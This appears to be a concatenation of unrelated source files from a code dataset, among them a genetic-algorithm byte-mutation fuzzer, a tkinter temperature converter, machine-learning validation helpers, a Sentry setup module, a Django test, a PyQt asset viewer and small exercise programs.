cver_s(tup):\r\n \"\"\"Convert tuple version back to string\"\"\"\r\n tup = list(tup)\r\n while tup and not tup[-1]:\r\n del tup[-1]\r\n if not tup:\r\n return \"0.0\"\r\n if len(tup)==1:\r\n tup.append(0)\r\n return \".\".join([str(x) for x in tup])\r\n\r\ndef compare_versions(v1,v2):\r\n v1 = list(v1)\r\n v2 = list(v2)\r\n while len(v1)= (best.score / sum_fitness):\n best = c\n return best\n elif method == \"worst\":\n sum_fitness = 0.0\n for c in population:\n sum_fitness += c.score\n worst = Data(\"\")\n worst.score = 100\n for c in population:\n #print(\"{} {}\".format(c.data, (c.score / sum_fitness)))\n if (c.score / sum_fitness) <= (worst.score / sum_fitness):\n worst = c\n return worst\n\n def start(self):\n parent1 = None\n parent2 = None\n\n temp_pop = self.population.chromosomes\n\n while parent1 is None and parent2 is None:\n print(\"[+] Initiating parent selection\")\n parent1 = self.select(temp_pop, \"best\")\n temp_pop.remove(parent1)\n parent2 = self.select(temp_pop, \"best\")\n\n child1 = Data(parent1.data, parents=[parent1, parent2])\n child2 = Data(parent1.data, parents=[parent1, parent2])\n\n if random.random() <= 1.00:#self._prob_crossover:\n print(\"[+] Initiating crossover\")\n return self.crossover([child1, child2], [parent1, parent2])\n else:\n print(\"[+] Selection complete, children added to population\")\n self.population.chromosomes.append(child1)\n self.population.chromosomes.append(child2)\n return [child1, child2]\n\n def crossover(self, children, parents):\n\n loci = random.randint(0, len(parents[0].data) - 1)\n children[0].data = parents[0].data[:loci] + parents[1].data[loci:]\n children[1].data = parents[1].data[:loci] + parents[0].data[loci:]\n\n if random.random() <= 1.00:#self._prob_mutation:\n print(\"[+] Crossover complete, moving to mutation\")\n return self.mutate(children, \"Random\", 1, 1)\n else:\n print(\"[+] Crossover complete, children added to population\")\n self.population.chromosomes.append(children[0])\n self.population.chromosomes.append(children[1])\n return children\n\n\n def mutate(self, children, mutate_type, num_bytes, iterations):\n # If statement so that we dont have to specify\n # in the tool code what mutator we want to use\n # it is now a param for thie component.\n for child in children:\n if mutate_type == \"Standard\":\n print(\"[+] Fuzzing Standard style executed\")\n child.data = self.standard(data=child.data, iterations=iterations)\n elif mutate_type == \"Seq\":\n print(\"[+] Fuzzing Seq style executed\")\n 
child.data = self.seq_mutate(child.data, num_bytes, iterations)\n elif mutate_type == \"Random\":\n print(\"[+] Fuzzing Random style executed\")\n child.data = self.random_mutate(child.data, num_bytes, iterations)\n else:\n print(\"Your request is not a known mutation type\")\n print(\"[+] Mutation complete, adding children to population\")\n self.population.chromosomes.append(children[0])\n self.population.chromosomes.append(children[1])\n return children\n\n def breed(self):\n\n self.assess_all()\n\n children = self.start()\n\n self.assess_all()\n\n for child in children:\n print(\"{} {}\".format(child.data, child.ratio))\n\n\n def random_mutate(self, data,num_bytes,iterations):\n # The for loop is for num of iterations\n # then a nested for loop for num of bytes to chance at once\n # byte is set to random chr and index is any byte from 0,len(data)\n # Ex num_bytes = 2 ; iterations = 1;\n # og = \"AAAAAA\" mutated = \"A%AA@A\"\n for x in range(iterations):\n iter_data = data\n for y in range(num_bytes):\n byte = chr(random.randrange(0,256))\n index = random.randrange(0, len(data))\n iter_data = iter_data[:index] + byte + iter_data[index+1:]\n return iter_data\n\n\n\n def seq_mutate(self, data,num_bytes,iterations):\n for x in xrange(iterations):\n byte = chr(random.randrange(0,256))\n index = 0\n while index < len(data):\n # If statement to avoid writing more random bytes\n # than the file originally had.Ex\n # og = \"AAAAA\"\n if index+num_bytes <= len(data):\n return data[:index] + (byte * num_bytes) + data[index+num_bytes:]\n #A section bytes section C section\n else:\n print(\"Failed to mutate\")\n return data\n index = index + 1\n\n\n def standard(self, data, iterations):\n # The for loop is for num of iterations\n # byte is set to a random chr 0,256\n # index as well from 0,len(data)\n # Ex iterations = 1;\n # og = \"AAAAAA\" mutated = \"AAA@AA\"\n for x in xrange(iterations):\n byte = chr(random.randrange(0, 256))\n #print(byte)\n index = random.randrange(0, len(data))\n #print(index)\n if index in xrange(0, len(data)):\n return data[:index] + byte + data[:index]\n\n '''\n parser = argparse.ArgumentParser(description='File Mutation fuzzer.')\n\n parser.add_argument('--file',\n help = 'The file to operate the mutational fuzzing on',\n type = str,\n required = True,\n )\n parser.add_argument('--new_file',\n help = 'The file to save the changes to once completed',\n type = str,\n required = True,\n )\n\n parser.add_argument('--fuzztype',\n help = 'Fuzz Type either - Standard Seq(sequential) or Random',\n type = str,\n required = True,)\n\n parser.add_argument('--num_bytes',\n help = 'The number of bytes to operate on',\n type = int,\n required = False,\n )\n\n\n parser.add_argument('--iterations',\n help = 'The number of iterations to run during fuzzing',\n type = int,\n required = True,)\n\n\n \n args = parser.parse_args()\n \n print(\"USAGE: FILE.py --file --fuzztype\")\n with open(args.file, 'rb') as f:\n contents = f.read()\n \n \n print(args)\n print(args.file)\n print(args.new_file)\n print(args.fuzztype)\n print(args.num_bytes)\n print(args.iterations)\n num_bytes = args.num_bytes\n iterations = args.iterations\n mutate_type = args.fuzztype\n data = contents\n '''\n\n#mutate(data,mutate_type,num_bytes,iterations)\nif __name__ == '__main__':\n #mutate(data,mutate_type,num_bytes,iterations)\n data = Data(\"AAAAAAAA\")\n data.score = 5\n data1 = Data(\"AAAAAABB\")\n data1.score = 8\n data2 = Data(\"AAAABBBB\")\n data2.score = 2\n data3 = Data(\"AABBBBBB\")\n data3.score = 7\n\n p 
= God()\n p.population.chromosomes.append(data)\n p.population.chromosomes.append(data1)\n p.population.chromosomes.append(data2)\n p.population.chromosomes.append(data3)\n\n p.breed()\n\n\n\n\n","sub_path":"GenXFuzz/src/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":9261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"109552581","text":"import tkinter as tk\r\n\r\n\r\ndef fahrenheit_to_celsius():\r\n \"\"\"Convert the value for Fahrenheit to Celsius and insert the\r\n result into lbl_result.\r\n \"\"\"\r\n fahrenheit = ent_temperature.get()\r\n celsius = (5 / 9) * (float(fahrenheit) - 32)\r\n lbl_result[\"text\"] = f\"{round(celsius, 2)} \\N{DEGREE CELSIUS}\"\r\n\r\n\r\ndef celsius_to_fahrenheit():\r\n \"\"\"Convert the value for Celsius to Fahrenheit to and insert the\r\n result into lbl_result.\r\n \"\"\"\r\n celsius = ent_temperature.get()\r\n fahrenheit = (9 / 5) * (float(celsius)) + 32\r\n lbl_result[\"text\"] = f\"{round(fahrenheit, 2)} \\N{DEGREE FAHRENHEIT}\"\r\n\r\n\r\n# Set-up the window\r\nwindow = tk.Tk()\r\nwindow.title(\"Temperature Converter\")\r\nwindow.resizable(width=False, height=False)\r\n\r\n# Create the Fahrenheit entry frame with an Entry\r\n# widget and label in it\r\nfrm_entry = tk.Frame(master=window)\r\nent_temperature = tk.Entry(master=frm_entry, width=10)\r\n# lbl_temp = tk.Label(master=frm_entry, text=\"\\N{DEGREE FAHRENHEIT}\")\r\n\r\n# Layout the temperature Entry and Label in frm_entry\r\n# using the .grid() geometry manager\r\nent_temperature.grid(row=0, column=0, sticky=\"e\")\r\n# lbl_temp.grid(row=0, column=1, sticky=\"w\")\r\n\r\n# Create the conversion Button and result display Label\r\nbtn_convert_to_c = tk.Button(\r\n master=window,\r\n text=\"\\N{DEGREE FAHRENHEIT}\",\r\n command=fahrenheit_to_celsius\r\n)\r\n\r\nbtn_convert_to_f = tk.Button(\r\n master=window,\r\n text=\"\\N{DEGREE CELSIUS}\",\r\n command=celsius_to_fahrenheit\r\n)\r\nlbl_result = tk.Label(master=window, text=\"\")\r\n\r\n# Set-up the layout using the .grid() geometry manager\r\nfrm_entry.grid(row=0, column=0, padx=10)\r\nbtn_convert_to_c.grid(row=0, column=1, pady=10)\r\nbtn_convert_to_f.grid(row=0, column=2, pady=10)\r\nlbl_result.grid(row=0, column=3, padx=10)\r\n\r\n# Run the application\r\nwindow.mainloop()\r\n","sub_path":"Temp_Conv.py","file_name":"Temp_Conv.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"517746986","text":"def justify(line, length):\n\n #length variable is unnecessary\n #simply create an empty string, then build said string with '1234567890'\n #no additional data structures required, space complexity O(1)\n #while loop makes the solution O(n)\n\n spaces = \"\"\n buffer_size = 0\n line_length = len(line)\n\n if line_length < buffer_size:\n return spaces\n\n while buffer_size < line_length:\n spaces += \"1234567890\"\n buffer_size = len(spaces)\n\n return spaces\n\n\nif __name__ == '__main__':\n line = \"The quick brown fox jumps over the lazy dog.\"\n length = 52\n\n buff = justify(line, length)\n print(line)\n print(buff)","sub_path":"real_self_challenge.py","file_name":"real_self_challenge.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100359932","text":"\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.model_selection import 
train_test_split\nfrom sklearn.model_selection import KFold\nimport pandas as pd\nfrom numpy.random import RandomState\n\nfrom tools import rmse_cal,mae_cal,cor_cal,mean_cal,frange,accuracy,precision,recall,aupr,\\\n\t\tf1_score,make_binary\n\n\ndef regression_cv(n,model,data):\n# do the cross validation in regression problem\n# input => n: nfold, model, training data\n\n pred=pd.DataFrame()\n real=pd.DataFrame()\n\n data_t=data.iloc[:,1:].transpose()\n\n kf=KFold(n_splits=n,shuffle=True)\n prediction=pd.DataFrame(columns=['real','pred'])\n\n for train, test in kf.split(data_t):\n\n x_train=data_t.iloc[train,:-1].astype('float64').values\n y_train=data_t.iloc[train,-1].astype('float64').values\n model.fit(x_train,y_train)\n\n x_test=data_t.iloc[test,:-1].astype('float64').values\n y_test=data_t.iloc[test,-1].astype('float64').values\n\n pred=pred.append(pd.DataFrame(model.predict(x_test)))\n real=real.append(pd.DataFrame(y_test))\n\n prediction=pd.concat([real,pred],axis=1)\n\n rmse=rmse_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n mad=mae_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n cor=cor_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('rmse : '+str(rmse)+'\\nmad : '+str(mad)+'\\ncor : '+str(cor[0]))\n\n return prediction\n\ndef classification_cv(n,model,data):\n# do the cross validation in classification problem\n# input => n fold, model, training data\n\n pred=pd.DataFrame()\n real=pd.DataFrame()\n\n data_t=data.iloc[:,1:].transpose()\n\n kf=KFold(n_splits=n,shuffle=True)\n prediction=pd.DataFrame(columns=['real','pred'])\n\n y_data=data_t.iloc[:,-1]\n y_data=pd.DataFrame(data=make_binary('normal','cancer',y_data))\n\n\n for train, test in kf.split(data_t):\n\n x_train=data_t.iloc[train,:-1].astype('float64').values\n y_train=y_data.iloc[train,-1].values\n model.fit(x_train,y_train)\n\n x_test=data_t.iloc[test,:-1].astype('float64').values\n y_test=y_data.iloc[test,-1].values\n\n pred=pred.append(pd.DataFrame(model.predict(x_test)))\n real=real.append(pd.DataFrame(y_test))\n\n prediction=pd.concat([pred,real],axis=1)\n\n acc=accuracy(prediction.iloc[:,0],prediction.iloc[:,1])\n prec=precision(prediction.iloc[:,0],prediction.iloc[:,1])\n rec=recall(prediction.iloc[:,0],prediction.iloc[:,1])\n f1=f1_score(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('accuracy : '+str(acc)+'\\nprecision :'+str(prec)\n +'\\nrecall : '+str(rec)+'\\nf1_score : '+str(f1))\n\n return prediction\n\ndef test_preprocessing(test_df,dataset):\n# preprocess the test set for using same feature with training set\n# input => test data, trainng dataset\n\n if 'CpG_site' in test_df.columns:\n test_df.rename(columns={'CpG_site': 'Composite Element REF'}, inplace=True)\n elif 'ID_REF' in test_df.columns:\n test_df.rename(columns={'ID_REF': 'Composite Element REF'}, inplace=True)\n\n selected=pd.DataFrame(columns=['Composite Element REF'],data=dataset.iloc[:,0])\n raw_data=pd.merge(test_df,selected,how='right',on='Composite Element REF')\n\n raw_data=raw_data.replace('null',float('nan'))\n raw_data=raw_data.T.fillna(raw_data.mean(axis=1)).T\n raw_data.fillna(0.5,inplace=True)\n test_data=raw_data.transpose()\n\n return test_data\n\ndef external_val_reg(testdf,dataset,model):\n# do the external validation in regression problem\n# input : test data, training data, model\n\n prediction=pd.DataFrame(columns=['predict','real'])\n\n data_t=dataset.iloc[:,1:].transpose()\n X_data = data_t.iloc[:,:-1].values\n y_data = data_t.iloc[:,-1].values\n\n test_data=test_preprocessing(testdf,dataset)\n 
test_x=test_data.iloc[1:, :-1].astype('float64').values\n test_y=test_data.iloc[1:, -1].astype('float64').values\n\n model.fit(X_data,y_data)\n\n a=pd.DataFrame(model.predict(test_x))\n real=pd.DataFrame(test_y)\n prediction=pd.concat([a,real],axis=1)\n\n rmse=rmse_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n mae=mae_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n cor=cor_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('rmse = '+str(rmse) +'\\nmae = '+str(mae)+'\\ncor = '+str(cor[0]) )\n\n return prediction\n\n\ndef external_val_classif(testdf,dataset,model):\n# do the external validation in classification problem\n# input test data, training data, model\n\n prediction=pd.DataFrame(columns=['predict','real'])\n\n data_t=dataset.iloc[:,1:].transpose()\n X_data = data_t.iloc[:,:-1].astype('float64').values\n y_data = data_t.iloc[:,-1]\n y_data=make_binary('normal','cancer',y_data).values\n\n tmp=dataset.iloc[:-1,:]\n test_data=test_preprocessing(testdf,tmp)\n test_x=test_data.iloc[1:, :].astype('float64').values\n test_y=testdf.iloc[-1, 1:]\n test_y=make_binary('normal','cancer',test_y).values\n\n model.fit(X_data,y_data)\n\n a=pd.DataFrame(model.predict(test_x))\n real=pd.DataFrame(test_y)\n prediction=pd.concat([a,real],axis=1)\n\n acc=accuracy(prediction.iloc[:,0],prediction.iloc[:,1])\n prec=precision(prediction.iloc[:,0],prediction.iloc[:,1])\n rec=recall(prediction.iloc[:,0],prediction.iloc[:,1])\n f1=f1_score(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('accuracy : '+str(acc)+'\\nprecision :'+str(prec)\n +'\\nrecall : '+str(rec)+'\\nf1_score : '+str(f1))\n\n return prediction\n\ndef cal_external_auc(test_df,y_score):\n# calculate auc and aupr for test data\n# input : test data, y_score for feature of test data\n\n test_y=test_df.iloc[-1, 1:]\n test_y=make_binary('normal','cancer',test_y).values\n fpr,tpr,threshold = roc_curve(test_y,y_score)\n roc_auc=auc(fpr,tpr)\n aupr_value=aupr(test_y,y_score)\n print('auc : '+str(roc_auc)+'\\naupr : '+str(aupr_value))\n\n return roc_auc, aupr_value\n\n\ndef cal_auc(inputdf,model,testratio):\n #preprocessing for ROC curve\n\n input_data=inputdf.iloc[:,1:].transpose()\n X_data=input_data.iloc[:,:-1].values\n y_data=input_data.iloc[:,-1]\n y_data=make_binary('normal','cancer',y_data)\n\n X_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size=testratio\n ,random_state=RandomState(None))\n model.fit(X_train,y_train)\n\n y_score=model.decision_function(X_test)\n fpr,tpr,threshold = roc_curve(y_test,y_score,pos_label=1)\n roc_auc=auc(fpr,tpr)\n Aupr=aupr(y_test,y_score)\n\n return y_score,fpr,tpr,threshold,roc_auc\n\ndef draw_roc(inputdf,model,testratio):\n# draw roc curve\n# input : training data, model, ratio for test\n\n plt.figure()\n lw=2\n y_score,fpr,tpr,threshold,roc_auc= cal_auc(inputdf,model,testratio)\n\n plt.plot(fpr,tpr,color='darkorange',lw=lw,label='ROC curve (area=%0.2f)' % roc_auc)\n plt.plot([0,1],[0,1],color='navy',lw=lw,linestyle='--')\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.legend(loc=\"lower right\")\n","sub_path":"machineLearning/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622256349","text":"# Sebastian Staszczyk\n\nimport random\nnumber = random.randint(1, 6)\ni = 0\ncounter = 0\nwhile i==0:\n try:\n attempt = int(input('Podaj liczbę od 1 do 6: '))\n counter += 1\n if attempt == number:\n print('')\n 
print(f\"Gratulacje! Wygrałeś. Szukana liczba to: {number}\")\n print(f\"Udało się po: {counter} próbie.\")\n break\n else:\n print('')\n print(f\"Nie udało się. Próbuj dalej!\")\n except ValueError:\n print('\\033[1m' +'Tylko cyfry!')\n continue\n ","sub_path":"01-TypesAndVariables/After class/Zad 29 - Gra z komputerem.py","file_name":"Zad 29 - Gra z komputerem.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"632735049","text":"from typing import Dict, List\n\nimport sentry_sdk\nfrom fastapi import Request\n\nfrom src.config import env\nfrom src.exceptions.exception import Unauthorized\n\n\ndef start_sentry(integrations: List = []) -> None:\n \"\"\"\n Initialize Sentry to capture errors\n \"\"\"\n sentry_sdk.init(\n environment=env.APP_ENV,\n dsn=env.SENTRY_DSN,\n integrations=integrations,\n before_send=before_send,\n debug=env.APP_DEBUG,\n )\n\n\ndef send_sentry_event(exc: BaseException, request: Request):\n if env.APP_DEBUG:\n return\n with sentry_sdk.push_scope() as scope:\n scope.set_context(\"request\", request)\n scope.user = {\"ip_address\": request.client.host, \"request\": request}\n sentry_sdk.capture_exception(exc)\n\n\ndef before_send(event: Dict, hint: Dict):\n \"\"\"\n Ignore specific types of exceptions here\n Source: https://github.com/getsentry/sentry-python/issues/149#issuecomment-434448781\n \"\"\"\n\n if \"exc_info\" in hint:\n exc_type, exc_value, tb = hint[\"exc_info\"]\n if is_error_ignored(exc_value):\n return None\n\n return event\n\n\ndef is_error_ignored(exception: Exception) -> bool:\n \"\"\"\n Check if the given exception is to be ignored\n \"\"\"\n return isinstance(exception, (Unauthorized))\n","sub_path":"src/lib/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332834673","text":"\"\"\"Contain the unit tests related to the models in app ``events``.\"\"\"\n\nimport datetime\n\nfrom django.test import TestCase\n\nfrom teamspirit.core.models import Address, Location\nfrom teamspirit.events.models import Event\n\n\nclass EventModelTestsCase(TestCase):\n \"\"\"Test the model ``Event``.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.address = Address.objects.create(\n label_first=\"1 rue de l'impasse\",\n label_second=\"\",\n postal_code=\"75000\",\n city=\"Paris\",\n country=\"France\"\n )\n cls.location = Location.objects.create(\n name=\"Salle des fêtes de Paris\",\n address=cls.address\n )\n cls.event = Event.objects.create(\n date=datetime.date(2020, 9, 6),\n time=datetime.time(10, 30),\n title=\"Assemblée Générale de l'association\",\n location=cls.location\n )\n\n def test_event_is_event_instance(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.1\n\n Test that event is an ``Event`` instance.\n \"\"\"\n self.assertIsInstance(self.event, Event)\n\n def test_date(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.2\n\n Test the date.\n \"\"\"\n self.assertIsInstance(self.event.date, datetime.date)\n self.assertEqual(self.event.date, datetime.date(2020, 9, 6))\n\n def test_time(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.3\n\n Test the time.\n \"\"\"\n self.assertIsInstance(self.event.time, datetime.time)\n self.assertEqual(self.event.time, datetime.time(10, 
30))\n","sub_path":"tests/unit/events/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199609072","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n Author: kun.wang\n Create: 2013-04-26\n'''\n\nimport os, sys, string\nimport math\nimport random\nfrom PyQt4 import QtCore, QtGui\n\nfrom pCore import *\n\nbackground_colors = [\n QtGui.QColor(255, 103, 103),\n QtGui.QColor(255, 160, 103),\n QtGui.QColor(226, 125, 43),\n QtGui.QColor(84, 201, 87),\n QtGui.QColor(53, 200, 160),\n QtGui.QColor(63, 175, 23),\n QtGui.QColor(123, 120, 240),\n QtGui.QColor(207, 96, 220),\n QtGui.QColor(230, 82, 160),\n QtGui.QColor(146, 146, 146),\n]\n\npColor = {\n 'red' : QtGui.QColor(255, 0, 0),\n 'green' : QtGui.QColor(0, 255, 0),\n 'blue' : QtGui.QColor(0, 0, 255),\n}\n\npBrush = {\n \"white\" : QtGui.QBrush(QtGui.QColor(255, 255, 255)),\n \"red\" : QtGui.QBrush(QtGui.QColor(255, 0, 0)),\n \"green\" : QtGui.QBrush(QtGui.QColor(0, 255, 0)),\n \"blue\" : QtGui.QBrush(QtGui.QColor(0, 0, 255))\n}\n\npPen = {\n \"white\" : QtGui.QPen(QtGui.QColor(255, 255, 255)),\n \"light_gray\" : QtGui.QPen(QtGui.QColor(200, 200, 200)),\n \"red\" : QtGui.QPen(QtGui.QColor(255, 0, 0)),\n \"green\" : QtGui.QPen(QtGui.QColor(0, 255, 0)),\n \"blue\" : QtGui.QPen(QtGui.QColor(0, 0, 255))\n}\n\nclass AssetViewer(QtGui.QWidget, Asset):\n \"\"\"\n Use this widget to display asset.\n \"\"\"\n def __init__(self):\n QtGui.QWidget.__init__(self)\n Asset.__init__(self)\n \n self.isSelected = False\n self.isLoaded = False\n self.hasThumb = False\n\n self.initDrawAttrib()\n self.initFeatherAttrib()\n \n def initDrawAttrib(self):\n self.name_font = QtGui.QFont()\n\n self.bg_color = background_colors[random.randrange(10)]\n self.edge_size = 5\n self.pen_selected = QtGui.QPen(QtGui.QColor(255, 255, 0))\n self.pen_selected.setWidth(self.edge_size) \n self.pen_selected.setJoinStyle(QtCore.Qt.MiterJoin)\n\n self.image_thumb = QtGui.QImage()\n\n def initFeatherAttrib(self):\n self.setToolTip(self.name)\n\n def setThumb(self, thumb = None):\n if thumb:\n if os.path.isfile(thumb):\n self.image_thumb.load(thumb)\n self.hasThumb = True\n else:\n self.hasThumb = False\n self.repaint()\n\n def setSelected(self, selected = True):\n self.isSelected = selected\n self.repaint()\n \n def setLoaded(self, loaded = True):\n self.isLoaded = loaded\n self.repaint()\n\n def changeSize(self, x, y):\n self.resize(x, y)\n self.repaint()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n asset_name_height = max(self.height() * 0.15, 5)\n asset_name_y = self.height() * 0.75\n # draw background\n painter.fillRect(self.rect(), self.bg_color)\n if self.hasThumb:\n thumb_rect = QtCore.QRect(0, asset_name_height, self.width(), self.height() - asset_name_height)\n painter.drawImage(self.rect(), self.image_thumb)\n # draw asset name\n painter.fillRect(0, asset_name_y, self.width(), asset_name_height, QtGui.QColor(40, 40, 40, 40))\n\n painter.setPen(pPen['white'])\n self.name_font.setPixelSize(asset_name_height)\n painter.setFont(self.name_font)\n painter.drawText(self.edge_size, asset_name_y + asset_name_height * 0.8, \"%s\" % self.name)\n if self.version:\n painter.drawText(self.width() - self.edge_size - asset_name_height * 1.5, asset_name_height, '%s' % self.version)\n\n box_size = self.height() - asset_name_y - asset_name_height + 1\n painter.setPen(QtCore.Qt.NoPen)\n if 1:\n painter.fillRect(0, asset_name_y + 
asset_name_height, box_size, box_size, pColor['red'])\n if 1:\n painter.fillRect(box_size, asset_name_y + asset_name_height, box_size, box_size, pColor['green'])\n if 1:\n painter.fillRect(box_size * 2, asset_name_y + asset_name_height, box_size, box_size, pColor['blue'])\n\n if self.isSelected:\n painter.setPen(self.pen_selected)\n painter.drawRect(self.edge_size/2, self.edge_size/2,\\\n self.width() - self.edge_size, self.height() - self.edge_size)\n\n def mouseReleaseEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton:\n self.setSelected(not self.isSelected)\n self.emit(QtCore.SIGNAL(\"select\"), self.id)\n\nclass AssetContainer(QtGui.QScrollArea):\n def __init__(self, parent = None, assets = None):\n QtGui.QScrollArea.__init__(self, parent)\n self.item_area = QtGui.QWidget()\n self.setWidget(self.item_area)\n\n self.item_x = 128\n self.item_y = 128\n self.item_min = 64\n self.item_max = 256\n self.edge = 10\n self.size_x = self.item_x + self.edge\n self.size_y = self.item_y + self.edge\n self.auto_space = False\n \n def addAsset(self, asset):\n asset.setParent(self.item_area)\n asset.changeSize(self.item_x, self.item_y)\n asset.show()\n \n def addAssets(self, assets):\n for asset in assets:\n self.addAsset(asset)\n self.layout()\n \n def removeAssets(self):\n assets = self.item_area.children()\n if assets:\n for asset in assets:\n asset.setParent(None)\n \n def layout(self):\n w = self.width() - 20\n assets = self.item_area.children()\n\n num_x = max(math.ceil(w / (self.item_x + self.edge)), 1) # Can do -1\n num_y = math.ceil(len(assets) / num_x)\n self.item_area.resize(w, num_y * (self.item_y + self.edge) + 50)\n\n main_w = self.item_area.width()\n main_h = self.item_area.height()\n num_x = max(math.ceil(main_w / (self.item_x + self.edge)), 1) # Can do -1\n \n x = 0\n y = 0\n for i in range(len(assets)):\n space_x = 0\n if self.auto_space:\n space_x = (main_w - self.edge * 2 - num_x * (self.item_x + self.edge)) / num_x\n assets[i].move(self.edge * 2 + x * (self.item_x + self.edge + space_x), self.edge*2 + y * (self.item_y + self.edge))\n x += 1\n if x >= num_x:\n x = 0\n y += 1\n \n def resizeEvent(self, event):\n self.layout()\n \n def changeItemSize(self, mount):\n assets = self.item_area.children()\n self.item_x += mount\n if self.item_x > self.item_max:\n self.item_x = self.item_max\n elif self.item_x < self.item_min:\n self.item_x = self.item_min\n \n self.item_y += mount\n if self.item_y > self.item_max:\n self.item_y = self.item_max\n elif self.item_y < self.item_min:\n self.item_y = self.item_min\n \n for a in assets:\n a.changeSize(self.item_x, self.item_y)\n \n self.layout()\n\n def keyPressEvent(self, event):\n key = event.key()\n if key == 93:\n self.changeItemSize(2)\n if key == 91:\n self.changeItemSize(-2)\n\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n desktop = app.desktop()\n deskrect = desktop.screenGeometry()\n px = deskrect.width()\n py = deskrect.height()\n \n container = AssetContainer()\n aaa = []\n for i in range(30):\n a = AssetViewer()\n if i%2 == 0:\n a.setThumb('E:\\\\project\\\\temp\\\\a%d.jpg' % (i%5))\n a.version = '%03d' % (i%10)\n\n container.addAsset(a)\n \n aaa.append(a)\n\n container.resize(500, 500)\n\n container.show()\n\n \n # t = Asset()\n # t.resize(200, 200)\n # t.version = '001'\n # t.show()\n\n sys.exit(app.exec_())\n 
\n","sub_path":"cgPipeline/old/AssetMG4/pUI.py","file_name":"pUI.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359737138","text":"class Solution(object):\n def findMaxConsecutiveOnes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n current_max = 0\n max_consecutives = 0\n for i in nums:\n if i == 1:\n current_max += 1\n max_consecutives = max(max_consecutives, current_max)\n else:\n current_max = 0\n return max_consecutives","sub_path":"max-consecutive-ones.py","file_name":"max-consecutive-ones.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}